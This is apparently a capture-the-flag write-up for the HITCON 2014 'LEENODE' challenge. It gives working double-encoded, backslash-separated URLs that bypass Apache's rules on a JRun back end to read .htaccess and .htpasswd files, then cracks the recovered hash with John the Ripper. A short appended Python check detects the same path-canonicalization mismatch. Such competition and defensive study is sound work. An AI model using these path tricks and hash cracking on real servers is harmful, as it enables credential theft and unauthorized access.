LEENODE
- Perhaps what we need to do is to access /admin/.
- The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
- *.jsp was redirected to the JRun server.
- I found vulnerability information about JRun.
http://203.66.57.98/a;.jsp returned 500 Internal Server Error. It is interesting. Was it from Apache?
I tried to escape the URL for Apache; http://203.66.57.98/a%253b.jsp was handled as /a and returned a 404 error from JRun. It is very interesting.
Can I get /.htaccess or /admin/.htaccess? http://203.66.57.98/.htaccess%253b.jsp, http://203.66.57.98/admin/.htaccess%253b.jsp: The answer is no. These are blocked by Apache. We need more tricks.
Then, I found that JRun recognized the backslash as a directory separator (for Windows?). http://203.66.57.98/.%5Ca%253b.jsp was handled as /a by JRun.
Finally, I got /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp and /admin/.htpasswd via http://203.66.57.98/.%5Cadmin%5C.htpasswd%253b.jsp.
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd
AuthGroupFile /dev/null
require valid-user
hitc0n_1een0de:nlGc3XNhkrL1o
Use John. The password was ktw2z.
% john htpasswd
ktw2z (hitc0n_1een0de)
guesses: 1 time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014) c/s: 5319K trying: ktkcK - kk4iT
The flag was at http://203.66.57.98/admin/thefl4g.txt.
The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}
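
The parsing mismatch between the front end and the back end described above, expressed as a defensive check (an added example, not part of the original write-up): it compares a single-decode front-end view of a request path with a fully canonicalized view and labels requests that reach a protected path only under the second reading. The `PROTECTED` rule, the five-round decode limit and the label names are assumptions chosen for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumption: paths still changing after 5 decodes are rejected
# Hypothetical policy mirroring the write-up: .ht* files and /admin/ are protected.
PROTECTED = re.compile(r"(^|/)\.ht[^/]*$|^/admin(/|$)", re.IGNORECASE)


def canonicalize(raw_path):
    """Most permissive reading of a path: decode until stable, treat backslash
    as a separator, drop ';params', resolve '.' and '..'. None if unstable."""
    path = raw_path
    for _ in range(MAX_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None
    segments = [s.split(";", 1)[0] for s in path.replace("\\", "/").split("/")]
    return posixpath.normpath("/" + "/".join(s for s in segments if s))


def classify(raw_path):
    """Compare the front end's single-decode view with the canonical view."""
    canon = canonicalize(raw_path)
    if canon is None:
        return "reject"
    front_view = unquote(raw_path)  # one decode, backslash left as a literal
    if PROTECTED.search(front_view):
        return "protected"          # the front-end rule already applies
    if PROTECTED.search(canon):
        return "evasion"            # only the back-end reading hits the rule
    return "mismatch" if canon != front_view else "allow"


# Paths from the write-up plus one benign path (constructed test set).
SAMPLES = [
    "/index.jsp",
    "/a%253b.jsp",
    "/admin/.htaccess%253b.jsp",
    "/.%5Cadmin%5C.htaccess%253b.jsp",
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{classify(p):10} {p} -> {canonicalize(p)}")
```

Running the access-control decision on the canonical path, or rejecting any request labelled `mismatch` or `evasion` at the front end, closes the gap between the two readings.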